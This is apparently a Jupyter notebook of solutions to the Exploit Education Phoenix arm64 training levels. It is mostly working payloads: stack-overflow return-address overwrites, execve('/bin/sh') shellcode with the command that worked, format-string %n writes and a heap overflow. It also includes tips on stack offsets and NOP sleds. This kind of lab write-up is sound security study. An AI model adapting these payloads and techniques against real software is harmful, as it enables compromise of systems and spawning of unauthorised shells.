In [4]:
# challenge 1
import struct
a = 0x496c5962
a_byte = struct.pack("<I", a)

# this is the bytes  from 64 to 68 including
print(f" a: {hex(a)} is {a_byte}")
# build payload:
print((b'A' * 64) + a_byte)
# full command : python -c "print((b'A' * 64) + b'bYlI')"
#./stack-one `python -c "print((b'A' * 64) + b'bYlI')"`

 a: 0x496c5962 is b'bYlI'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI'


In [17]:
# challenge 2
import struct
a = 0x0d0a090a
a_byte = struct.pack("<I", a)

# this is the bytes  from 64 to 68 including
print(f" a: {hex(a)} is {a_byte}")
# build payload:
print((b'A' * 64) + a_byte)
# full command : python -c "print((b'A' * 64) + b'\n\t\n\r')"
#ExploitEducation=`python -c "print((b'A' * 64) + b'\n\t\n\r')"` ./stack-two

 a: 0xd0a090a is b'\n\t\n\r'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\t\n\r'


In [22]:
#challenge3

# congrats function address : 0x4007c4
func_addr = 0x04007c4
func_addr_data = struct.pack("<Q", func_addr)

# this is the bytes  from 64 to 68 including
print(f" a: {hex(func_addr)} is {func_addr_data}")
# build payload:
print((b'A' * 64) + func_addr_data)
#echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc4\x07@\x00\x00\x00\x00\x00" | ./stack-three 
#python -c "print((b'A' * 64) + b'\xc4\x07@\x00\x00\x00\x00\x00')" | ./stack-three

 a: 0x4007c4 is b'\xc4\x07@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc4\x07@\x00\x00\x00\x00\x00'


In [38]:
#challenge4

# complete level function address : 0x400714
func_addr = 0x0400714
func_addr_data = struct.pack("<Q", func_addr)

# this is the bytes  from 64 to 68 including
print(f" a: {hex(func_addr)} is {func_addr_data}")
# build payload (buffer + ret local variable) + stored x30 wihch is lr:
print((b'A' * 80) + func_addr_data)
# command python -c "print((b'A' * 80) + b'\x14\x07@\x00\x00\x00\x00\x00')"
len("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")

 a: 0x400714 is b'\x14\x07@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x14\x07@\x00\x00\x00\x00\x00'


88

In [81]:
#challenge5

# shellcode bytes
payload = bytearray.fromhex("".join("a8 1b 80 d2 e0 00 00 10 ff 0f 1e f8 e0 8f 1f f8 e1 03 00 91 e2 03 1f aa 01 00 00 d4 c0 03 5f d6 2f 62 69 6e 2f 73 68 00".split(" ")))
prev_stack_addr = b'B' * 8
# this is where we are going to return
shellcode_addr = struct.pack("<Q", 0x0000fffffffff560)

print(f"prev stack addr: {prev_stack_addr}")
print(f"shellcode addr: {shellcode_addr}")
# this is our shellcode to be executed
print(f" shellcode is {payload}")
# stack frame size of start level func is 144 but buffer starts from offset 0x10
print((b'A' * 128) + prev_stack_addr + shellcode_addr + payload)
# command python -c "print((b'A' * 128) + (b'B' * 8 ) + b'\x60\xf5\xff\xff\xff\xff\x00\x00' + b'\xa8\x1b\x80\xd2\xe0\x00\x00\x10\xff\x0f\x1e\xf8\xe0\x8f\x1f\xf8\xe1\x03\x00\x91\xe2\x03\x1f\xaa\x01\x00\x00\xd4\xc0\x03_\xd6/bin/sh\x00')"

"""
finally the command that worked was:
(python -c "print((b'A' * 128) + (b'B' * 8 ) + b'\x80\xf5\xff\xff\xff\xff\x00\x00' + b'\xa8\x1b\x80\xd2\xe0\x00\x00\x10\xff\x0f\x1e\xf8\xe0\x8f\x1f\xf8\xe1\x03\x00\x91\xe2\x03\x1f\xaa\x01\x00\x00\xd4\xc0\x03_\xd6/bin/sh\x00')";cat) | ./stack-five

Key notes;
1. stack layout is changed depnding on env. variables (gdb vs regular execeution).
    GDB puts more envirnoment variables which changes the stack layout.
    To solve this we can change the stack address till we get something we can work with.
    The easiest is to play with the stack address on a small shellcode that does infinite loop, that attach with gdb and
    findout the stack address.
    The other way is to put nop sled (pretty big, atleast 100 bytes to slide into the shellcode).
2. when /bin/sh is executed it need an open STDIN therefore, we must keep it open with cat command.
"""

prev stack addr: b'BBBBBBBB'
shellcode addr: b'`\xf5\xff\xff\xff\xff\x00\x00'
 shellcode is bytearray(b'\xa8\x1b\x80\xd2\xe0\x00\x00\x10\xff\x0f\x1e\xf8\xe0\x8f\x1f\xf8\xe1\x03\x00\x91\xe2\x03\x1f\xaa\x01\x00\x00\xd4\xc0\x03_\xd6/bin/sh\x00')
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB`\xf5\xff\xff\xff\xff\x00\x00\xa8\x1b\x80\xd2\xe0\x00\x00\x10\xff\x0f\x1e\xf8\xe0\x8f\x1f\xf8\xe1\x03\x00\x91\xe2\x03\x1f\xaa\x01\x00\x00\xd4\xc0\x03_\xd6/bin/sh\x00'


In [ ]:
#challenge format string 0
# just provide %p%p%p%p%p%p%p

In [124]:
#challenge fromat string 1
# the address of the changeme variable on stack
offset = 0x0000fffffffff538 - 0x0000fffffffff518
print(f" offset : {offset} there for we need to write { offset / 8} pointers")

target_value = struct.pack("<I", 0x45764f6c)
print(f"The target value is: {target_value}")


#We need to run the following (without trailing new line:
#python3 -c "print(('%16p' + '%16p') + 'lOvE', end = '')"
#Note: better use echo to eliminate trailing new  lines

 offset : 32 there for we need to write 4.0 pointers
The target value is: b'lOvE'


In [145]:
#challenge fromat string 2
# The address of changeme variable is :0x410b68

# the address of the changeme variable on stack
changeme_addr = 0x410b68
print(f" offset : {hex(changeme_addr)}")

buffer_start = 0x0000fffffffff420
ptr = 0x0000fffffffff508
print(f"our buffer starts on {0x0000fffffffff420}")
print(f"The address we have on the second argument is {0x0000fffffffff508} so the offset is {ptr - buffer_start} bytes")

changeme_addr = struct.pack("<Q", 0x410b68)
print(f"target addr encoded {changeme_addr}")

#We need to run the following :
# Note: in musl implementation we allowed to put maximum 9 arguments, This is implied by checking that the number before '$'
# is a digit (via isdigit function)
# we make the printf to "pop" arguments so we will get to a place in the stack where the target address is
# %n will write our addresss there.
print((b'%x' * 18) + b'.%x.%x.%x' + b'.%n' + b'h\x0bA\x00\x00\x00\x00\x00')
#'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%x.%x.%x.%nh\x0bA\x00\x00\x00\x00\x00'

 offset : 0x410b68
our buffer starts on 281474976707616
The address we have on the second argument is 281474976707848 so the offset is 232 bytes
target addr encoded b'h\x0bA\x00\x00\x00\x00\x00'
b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%x.%x.%x.%nh\x0bA\x00\x00\x00\x00\x00'


In [184]:
#challenge fromat string 3
# The address of changeme variable is :0x410b68

# the address of the changeme variable on stack
changeme_addr = 0x410b08
changeme_value = struct.pack("<I", 0x64457845)
print(f"offset : {hex(changeme_addr)}")
print(f"changeme value : {changeme_value}")

for index, char in enumerate(changeme_value):
    print(f"char number {3 - index} is : {hex(char)} ({char}) - this is the number of printed characters we need")

buffer_start = 0x0000fffffffff540
print(f"our buffer starts on {hex(buffer_start)}")



#We need to run the following :
"""
Notes:
1. we can use %<value>x where <value> can be any number (depending on the system of course) to increase
the number of bytes printed so far.
2. %hn will output short value (2 bytes) only this is how we wan't overwrite the cahngeme value we wrote before.
"""
print((b'%x' * 16) + (b'%x' * 6) + b'%25551x' + b'%n' + b'%5120x' + b'%hn' + (b'B' * 2) + b'\x0a\x0b\x41\x00\x00\x00\x00\x00' + (b'C' * 8) + b'\x08\x0b\x41\x00\x00\x00\x00\x00')
#python -c "print((b'%x' * 16) + (b'%x' * 6) + b'%25551x' + b'%n' + b'%5120x' + b'%hn' + (b'B' * 2) + b'\x0a\x0b\x41\x00\x00\x00\x00\x00' + (b'C' * 8) + b'\x08\x0b\x41\x00\x00\x00\x00\x00')"

offset : 0x410b08
changeme value : b'ExEd'
char number 3 is : 0x45 (69) - this is the number of printed characters we need
char number 2 is : 0x78 (120) - this is the number of printed characters we need
char number 1 is : 0x45 (69) - this is the number of printed characters we need
char number 0 is : 0x64 (100) - this is the number of printed characters we need
our buffer starts on 0xfffffffff540
b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%25551x%n%5120x%hnBB\n\x0bA\x00\x00\x00\x00\x00CCCCCCCC\x08\x0bA\x00\x00\x00\x00\x00'


In [182]:
# Heap 0 challenge
# Just pass it as an argument : python3 -c "import sys; sys.stdout.buffer.write((b'A' * 0x50) + b'\xb4\x0b\x40')")
#Note: in python3 the print() prints string therefore we must used buffer.write to output raw bytes

8

In [34]:
# Heap 1 challenge
addr_first_malloc_name_arg =   0xffffb7e56030
addr_second_malloc_structure = 0xffffb7e56050
winner_func_addr = struct.pack("<Q", 0x400be4)

br_to_win_shellcode = "8e 7c 81 d2 0e 08 a0 f2 c0 01 1f d6"
br_to_win_shellcode = bytearray.fromhex("".join(br_to_win_shellcode))

stack_ra_pointer = struct.pack("<Q", 0x0000fffffffff4d8)
addr_first_malloc_name_arg_bytes = struct.pack("<Q", addr_first_malloc_name_arg)
# Note: because we are passing via argv[] we can't put null bytes in the command line therefore,
#      we cant overwrite the RA of main
print(f"second arg is: {addr_first_malloc_name_arg_bytes}")
print("first arg is:")
print((br_to_win_shellcode + b'A' * (addr_second_malloc_structure - addr_first_malloc_name_arg - len(br_to_win_shellcode) + 8)) + stack_ra_pointer)

#In gdb:
# we run: $(echo -ne '\x8e|\x81\xd2\x0e\x08\xa0\xf2\xc0\x01\x1f\xd6AAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd8\xf4\xff\xff\xff\xff\x00\x00') $(echo -ne '0`\xe5\xb7\xff\xff\x00\x00')

second arg is: b'0`\xe5\xb7\xff\xff\x00\x00'
first arg is:
bytearray(b'\x8e|\x81\xd2\x0e\x08\xa0\xf2\xc0\x01\x1f\xd6AAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd8\xf4\xff\xff\xff\xff\x00\x00')


In [38]:
# Heap 2 challenge
# Its basically UAF
'A' * 33

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

In [ ]:
# Heap 3 challenge

In [49]:
#Network 0 challenge
import subprocess
import struct

# Start the process and create a pipe to its stdin
proc = subprocess.Popen(['/opt/phoenix/arm64/net-zero'], stdin=subprocess.PIPE, stdout = subprocess.PIPE)

print("Process executing! {}".format(proc))

data = proc.stdout.readline()
print(data)
data = proc.stdout.readline()
print(data)

# parse the line
number = data.split(b"'")[1]
print("the number is : {}".format(number))
number = int(number)
print(" in hex: {}".format(hex(number)))

output_data = struct.pack("<I", number)
print(output_data)
# Write to the process's stdin
proc.stdin.write(output_data)
proc.stdin.flush()

# Close stdin if no more data will be sent
proc.stdin.close()


data = proc.stdout.readline()
print(data)
proc.stdout.flush()
proc.stdout.close()
# Wait for the process to complete
rc = proc.wait()
print("return code is : {}".format(rc))

We got bytearray(b'\\\x13-\xa2')
We need to pass:  0xa22d135c
Which is:  b'\xa2-\x13\\'


In [66]:
#Network 1 challenge
import subprocess
import struct

# Start the process and create a pipe to its stdin
proc = subprocess.Popen(['/opt/phoenix/arm64/net-one'], stdin=subprocess.PIPE, stdout = subprocess.PIPE)

print("Process executing! {}".format(proc))

data = proc.stdout.readline()
print(data)
data = proc.stdout.read(4)
print(data)

# parse the line
output_data = struct.unpack("<I", data)[0]
print("the number is {}".format(output_data))
print("Encoded: {}".format(str(output_data).encode("ascii")))
output_data = str(output_data).encode("ascii")

# Write to the process's stdin
proc.stdin.write(output_data)
proc.stdin.flush()

# Close stdin if no more data will be sent
proc.stdin.close()


data = proc.stdout.readline()
print(data)
proc.stdout.flush()
proc.stdout.close()
# Wait for the process to complete
rc = proc.wait()
print("return code is : {}".format(rc))

b'3743283689'

In [68]:
# Net 2 challenge
import subprocess
import struct
import ctypes


# Start the process and create a pipe to its stdin
proc = subprocess.Popen(['/opt/phoenix/arm64/net-two'], stdin=subprocess.PIPE, stdout = subprocess.PIPE)

print("Process executing! {}".format(proc))
final_val = 0

# parse the data
data = proc.stdout.readline()
print(data)
data = proc.stdout.readline()
print(data)
for i in range(8):
    data = proc.stdout.read(8)
    print(data)
    output_data = struct.unpack("<Q", data)[0]
    print("the number is {}".format(output_data))
    final_val = ctypes.c_uint64(output_data + final_val).value

print("final_value is: {}".format(final_val))

final_data = struct.pack("<Q", final_val)
# Write to the process's stdin
proc.stdin.write(final_data)
proc.stdin.flush()

# Close stdin if no more data will be sent
proc.stdin.close()


data = proc.stdout.readline()
print(data)
proc.stdout.flush()
proc.stdout.close()
# Wait for the process to complete
rc = proc.wait()
print("return code is : {}".format(rc))

0x2b3133daefb04b4b7
49797213326510699703
0xffffffffffffffff
